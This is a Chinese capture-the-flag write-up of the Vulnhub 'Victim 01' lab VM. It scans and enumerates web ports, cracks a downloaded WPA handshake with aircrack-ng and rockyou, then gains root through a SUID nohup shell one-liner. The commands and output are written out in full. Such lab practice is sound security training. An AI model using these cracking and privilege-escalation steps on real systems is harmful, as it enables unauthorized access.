首页 > 其他分享 >Vulnhub Victim 01靶机解题过程

Vulnhub Victim 01靶机解题过程

时间:2022-11-13 11:45:25浏览次数:55  
标签:01 http -- 56.156 192.168 Vulnhub Victim root usr

Victim 01

识别目标主机IP地址

                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                           
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                          
 192.168.56.100  08:00:27:0c:40:47      1      60  PCS Systemtechnik GmbH                                                                                                                                                                  
 192.168.56.156  08:00:27:80:d1:6f      1      60  PCS Systemtechnik GmbH           

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.156

NMAP扫描

└─$ sudo nmap -sS -sV -sC -p- 192.168.56.156 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-12 21:39 EST
Nmap scan report for bogon (192.168.56.156)
Host is up (0.00038s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:e8:15:7d:8a:74:bc:45:09:76:34:13:2c:d8:1e:62 (RSA)
|   256 51:75:37:23:b6:0f:7d:ed:61:a0:61:18:21:89:35:5d (ECDSA)
|_  256 7d:36:08:ba:91:ef:24:9f:7b:24:f6:64:c7:53:2c:b0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open  http    BusyBox httpd 1.13
|_http-title: 404 Not Found
8999/tcp open  http    WebFS httpd 1.21
|_http-title: 0.0.0.0:8999/
|_http-server-header: webfs/1.21
9000/tcp open  http    PHP cli server 5.5 or later (PHP 7.2.30-1)
|_http-title: Uncaught Exception: MissingDatabaseExtensionException
MAC Address: 08:00:27:80:D1:6F (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.60 seconds

目标主机除了22端口运行SSH服务,其他端口80、8080、8999和9000均运行HTTP服务,接下来主要围绕HTTP服务来开展Enumeration

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ curl http://192.168.56.156                                                                                                         
No configuration file found and no installation code available. Exiting...                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ curl http://192.168.56.156/robots.txt
User-agent: *
Disallow: h@ck3rz!
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ curl http://192.168.56.156/h@ck3rz!  
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.156 Port 80</address>
</body></html>
                                 

/robots.txt文件暴漏了一个目录,但是却无法访问,奇怪!会不会是一个rabbithole

┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156/h@ck3rz! -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.156/h@ck3rz!
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/12 21:48:57 Starting gobuster in directory enumeration mode
===============================================================
Progress: 220014 / 220561 (99.75%)===============================================================
2022/11/12 21:51:42 Finished
===============================================================
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156/h@ck3rz!/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html 
zsh: event not found: /
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156/h@ck3rz!/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html 
zsh: event not found: /
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156/h@ck3rz! -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.sh,.txt,.html
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.156/h@ck3rz!
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,sh,txt,html
[+] Timeout:                 10s
===============================================================
2022/11/12 21:53:02 Starting gobuster in directory enumeration mode
===============================================================
Progress: 460170 / 1102805 (41.73%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/11/12 21:58:49 Finished
===============================================================
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ dirb http://192.168.56.156

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov 12 21:58:54 2022
URL_BASE: http://192.168.56.156/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          
                                                                                                                                                                                                                                    
---- Entering directory: http://192.168.56.156/images/ ----
+ http://192.168.56.156/images/.config (CODE:403|SIZE:279)                                                                                                                                                                                 
+ http://192.168.56.156/images/_vti_bin/_vti_adm/admin.dll (CODE:403|SIZE:279)                                                                                                                                                             
+ http://192.168.56.156/images/_vti_bin/_vti_aut/author.dll (CODE:403|SIZE:279)                                                                                                                                                            
+ http://192.168.56.156/images/_vti_bin/shtml.dll (CODE:403|SIZE:279)                                                                                                                                                                      
+ http://192.168.56.156/images/awstats.conf (CODE:403|SIZE:279)                                                                                                                                                                            
==> DIRECTORY: http://192.168.56.156/images/banners/                                                                                                                                                                                       
+ http://192.168.56.156/images/development.log (CODE:403|SIZE:279)                                                                                                                                                                         
+ http://192.168.56.156/images/global.asa (CODE:403|SIZE:279)                                                                                                                                                                              
+ http://192.168.56.156/images/global.asax (CODE:403|SIZE:279)                                                                                                                                                                             
==> DIRECTORY: http://192.168.56.156/images/headers/                                                                                                                                                                                       
+ http://192.168.56.156/images/index.html (CODE:200|SIZE:31)                                                                                                                                                                               
+ http://192.168.56.156/images/main.mdb (CODE:403|SIZE:279)                                                                                                                                                                                
+ http://192.168.56.156/images/php.ini (CODE:403|SIZE:279)                                                                                                                                                                                 
+ http://192.168.56.156/images/production.log (CODE:403|SIZE:279)                                                                                                                                                                          
+ http://192.168.56.156/images/spamlog.log (CODE:403|SIZE:279)                                                                                                                                                                             
+ http://192.168.56.156/images/thumbs.db (CODE:403|SIZE:279)                                                                                                                                                                               
+ http://192.168.56.156/images/Thumbs.db (CODE:403|SIZE:279)                                                                                                                                                                               
+ http://192.168.56.156/images/WS_FTP.LOG (CODE:403|SIZE:279)                                                                                                                                                                              
                                                                                                                                                                                                                                           
                                                                                                                                                                    
^C> Testing: http://192.168.56.156/includes/references                                                                                                                                                                                     
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ dirb http://192.168.56.156/h@ck3rz!                                                                                                  

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Nov 12 21:59:35 2022
URL_BASE: http://192.168.56.156/h@ck3rz!/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.156/h@ck3rz!/ ----
+ http://192.168.56.156/h@ck3rz!/.config (CODE:403|SIZE:279)                                                                                                                                                                               
                                                                                                                                                                          
                                                                                                                                                                                                                                           
-----------------
END_TIME: Sat Nov 12 21:59:39 2022
DOWNLOADED: 4612 - FOUND: 1

对80端口的信息收集没有太大收获,虽然心有不甘,哈哈。

接下来看一下8080端口:

┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ gobuster dir -u http://192.168.56.156:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                           
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.156:8080
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/12 22:03:17 Starting gobuster in directory enumeration mode
===============================================================
Progress: 220545 / 220561 (99.99%)===============================================================
2022/11/12 22:04:54 Finished
===============================================================

8080端口也没有暴漏出可利用的攻击面。

┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ curl http://192.168.56.156:8999/   
<head><title>0.0.0.0:8999/</title></head>
<body bgcolor=white text=black link=darkblue vlink=firebrick alink=red>
<h1>listing: 
<a href="/">/</a></h1><hr noshade size=1><pre>
<b>access      user      group     date             size  name</b>

drwxr-xr-x  nobody    nogroup   Apr 07  2020    &lt;DIR&gt;  <a href="wordpress/">wordpress</a>
drwxr-xr-x  nobody    nogroup   Mar 31  2020    &lt;DIR&gt;  <a href="wp-admin/">wp-admin</a>
drwxr-xr-x  nobody    nogroup   Mar 31  2020    &lt;DIR&gt;  <a href="wp-content/">wp-content</a>
drwxr-xr-x  nobody    nogroup   Mar 31  2020    &lt;DIR&gt;  <a href="wp-includes/">wp-includes</a>
-rw-r--r--  root      root      Apr 07  2020   197 kB  <a href="WPA-01.cap">WPA-01.cap</a>
-rw-r--r--  nobody    nogroup   Feb 06  2020   405  B  <a href="index.php">index.php</a>
-rw-r--r--  nobody    nogroup   Feb 12  2020    19 kB  <a href="license.txt">license.txt</a>
-rw-r--r--  nobody    nogroup   Jan 10  2020  7278  B  <a href="readme.html">readme.html</a>
-rw-r--r--  nobody    nogroup   Feb 06  2020  6912  B  <a href="wp-activate.php">wp-activate.php</a>
-rw-r--r--  nobody    nogroup   Feb 06  2020   351  B  <a href="wp-blog-header.php">wp-blog-header.php</a>
-rw-r--r--  nobody    nogroup   Feb 06  2020  2275  B  <a href="wp-comments-post.php">wp-comments-post.php</a>
-rw-r--r--  nobody    nogroup   Feb 06  2020  2913  B  <a href="wp-config-sample.php">wp-config-sample.php</a>
-rw-r--r--  nobody    nogroup   Feb 06  2020  3940  B  <a href="wp-cron.php">wp-cron.php</a>
-rw-r--r--  nobody    nogroup   Feb 06  2020  2496  B  <a href="wp-links-opml.php">wp-links-opml.php</a>
-rw-r--r--  nobody    nogroup   Feb 06  2020  3300  B  <a href="wp-load.php">wp-load.php</a>
-rw-r--r--  nobody    nogroup   Feb 10  2020    46 kB  <a href="wp-login.php">wp-login.php</a>
-rw-r--r--  nobody    nogroup   Feb 06  2020  8501  B  <a href="wp-mail.php">wp-mail.php</a>
-rw-r--r--  nobody    nogroup   Feb 10  2020    18 kB  <a href="wp-settings.php">wp-settings.php</a>
-rw-r--r--  nobody    nogroup   Feb 06  2020    30 kB  <a href="wp-signup.php">wp-signup.php</a>
-rw-r--r--  nobody    nogroup   Feb 06  2020  4755  B  <a href="wp-trackback.php">wp-trackback.php</a>
-rw-r--r--  nobody    nogroup   Feb 06  2020  3133  B  <a href="xmlrpc.php">xmlrpc.php</a>
</pre><hr noshade size=1>
<small><a href="http://bytesex.org/webfs.html">webfs/1.21</a> &nbsp; 13/Nov/2022 02:41:04 GMT</small>
</body>

把主要的文件查看了一下,其中一个文件 WPA-01.cap引起注意,看能否下载到本地

看能不能破解这个无线WIFI的密码

                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~/Vulnhub/Victim01]
└─$ aircrack-ng -w /usr/share/wordlists/rockyou.txt WPA-01.cap

                               Aircrack-ng 1.6 

      [00:00:13] 71018/14344392 keys tested (5391.78 k/s) 

      Time left: 44 minutes, 7 seconds                           0.50%

                           KEY FOUND! [ p4ssword ]


      Master Key     : 8F C0 1B 1B 85 06 0B 85 23 7C 83 74 F8 4B 4A FD 
                       50 CE EC 72 6F 85 17 5F B1 14 5E D2 F2 47 5D 1A 

      Transient Key  : 79 CE 15 5F 1A 2C DE 03 A8 2B 52 68 64 D3 77 A7 
                       E4 FF CD 49 0C ED E9 5E 3B 68 E6 83 26 06 0C 98 
                       8D 43 B6 7C E4 FE ED 2E 45 90 0D 6D 15 3A 3A 11 
                       6C 28 C0 E1 30 92 1B 84 A5 C5 67 3A 47 01 B4 1C 

      EAPOL HMAC     : 33 A5 CE E2 46 DB 4B 96 86 A1 6E D9 D2 A2 A6 E9 

破解成功,wifi的密码为p4ssword,

也许SSID以及这个密码同时也是ssh的密码

dlink@victim01:/usr/bin$ sudo -l
User dlink may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/TryHarder!

提权

dlink用户可以无需密码执行/usr/bin/TryHarder!

但是目标主机并不存在该文件,因此可以创建该文件,结果失败,没有权限创建该文件,需要另外想办法

dlink@victim01:/usr/bin$ find / -type f -perm /4000 2>/dev/null
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/nohup
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/at
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/arping
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/bin/mount
/bin/su
/bin/umount
/bin/ping
/bin/fusermount
dlink@victim01:/usr/bin$ /usr/bin/nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
/usr/bin/nohup: ignoring input and appending output to 'nohup.out'
# id
uid=1002(dlink) gid=1004(dlink) euid=0(root) groups=1004(dlink)
# cd /root
# ls -alh
total 68K
drwx------  7 root root 4.0K Apr  7  2020 .
drwxr-xr-x 23 root root 4.0K Apr  7  2020 ..
lrwxrwxrwx  1 root root    9 Aug  2  2019 .bash_history -> /dev/null
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
drwx------  2 root root 4.0K Apr  7  2020 .cache
drwx------  3 root root 4.0K Aug  2  2019 .gnupg
-rw-------  1 root root   49 Apr  7  2020 .lesshst
drwxr-xr-x  3 root root 4.0K Apr  7  2020 .local
-rw-------  1 root root    0 Apr  7  2020 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root    7 Apr  7  2020 .python_history
-rw-r--r--  1 root root   66 Apr  7  2020 .selected_editor
drwx------  2 root root 4.0K Apr  7  2020 .ssh
-rw-------  1 root root 8.1K Aug  3  2019 .viminfo
-rw-r--r--  1 root root  207 Apr  7  2020 .wget-hsts
-rw-r--r--  1 root root  556 Apr  7  2020 flag.txt
drwxr-xr-x  3 root root 4.0K Apr  7  2020 snap
# cat flag.txt
Nice work!

                .:##:::.
              .:::::/;;\:.
        ()::::::@::/;;#;|:.
        ::::##::::|;;##;|::
         ':::::::::\;;;/::'
              ':::::::::::
               |O|O|O|O|O|O
               :#:::::::##::.
              .:###:::::#:::::.
              :::##:::::::::::#:.
               ::::;:::::::::###::.
               ':::;::###::;::#:::::
                ::::;::#::;::::::::::
                :##:;::::::;::::###:::     .
              .:::::; .:::##::::::::::::::::
              ::::::; :::::::::::::::::##::  #rootdance
# 

成功提权!

本靶机主要的解决途径是通过破解无线报文,获得SSID和密码,而且假设这个SSID和密码同时也是系统的用户名和密码!

标签:01,http,--,56.156,192.168,Vulnhub,Victim,root,usr
From: https://www.cnblogs.com/jason-huawen/p/16885666.html

相关文章

  • 白嫖永久服务器1668309600001
    阿贝云服务器注册免费领取1核1g内存5m宽带10g内存的云服务器,对于个人来说完全够用了。还有免费备案和虚拟主机,免备案对于搭建个人博客就很方便,部署了小项目上去,运行流畅不......
  • 碎碎念-01
    停止了几天的力扣的每日一题,之前按照一个博主总结的【从零开始刷力扣顺序】进行刷题,我没有及时总结,自己每天打卡自己的每日一题,好像没有太多长进,还是只能做出几道简单题,中......
  • LOJ10150
    题目描述Hecy又接了个新任务:BE处理。BE中有一类被称为GBE。以下是GBE的定义:空表达式是GBE如果表达式A是GBE,则[A]与(A)都是GBE如果A与B都是GBE,那......
  • Data length too large: 10710120, max payload: 8388608, channel: NettyChannel [c
    1、报错信息cause:java.io.IOException:Datalengthtoolarge:10710120,maxpayload:8388608,channel:NettyChannel[channel=[id:0x09396776,/10.195.2.51:48......
  • vulnhub靶场之DRIPPING BLUES: 1
    准备:攻击机:虚拟机kali、本机win10。靶机:DRIPPINGBLUES:1,网段地址我这里设置的桥接,所以与本机电脑在同一网段,下载地址:https://download.vulnhub.com/drippingblues/drip......
  • 3010f_未命名
    为什么星星会是这个样子……可是???当我发疯似的到了那里时已经什么也没有了......
  • L01.linux技术-bond-----交换机对应配置
    通常情况下,虚拟机的聚合模式bond4对应交换机的动态聚合(LACP),虚拟机的bond0对应交换机的静态聚合,虚拟机如果是主备模式,那么交换机不需要做聚合,只需要划分接口vlan即可。......
  • java——继承与多态——抽象类001
    抽象的概念:          抽象方法和抽象类的格式:                抽象方法和抽象类的使用:       ......
  • 【《硬件架构的艺术》读书笔记】01 亚稳态的世界
    听说这本书对数字IC设计中的常见问题讲的非常清楚易懂,看了目录感觉确实都是数字设计中一些关键问题,而且一共才217页,争取这个月看完吧。书的PDF资源:链接:https://pan.baidu......
  • Vulnhub Sundown靶机解题过程
    Sundown识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/Sundown]└─$sudonetdiscover-ieth13CapturedARPReq/Reppackets,from3hosts.Totalsize:180......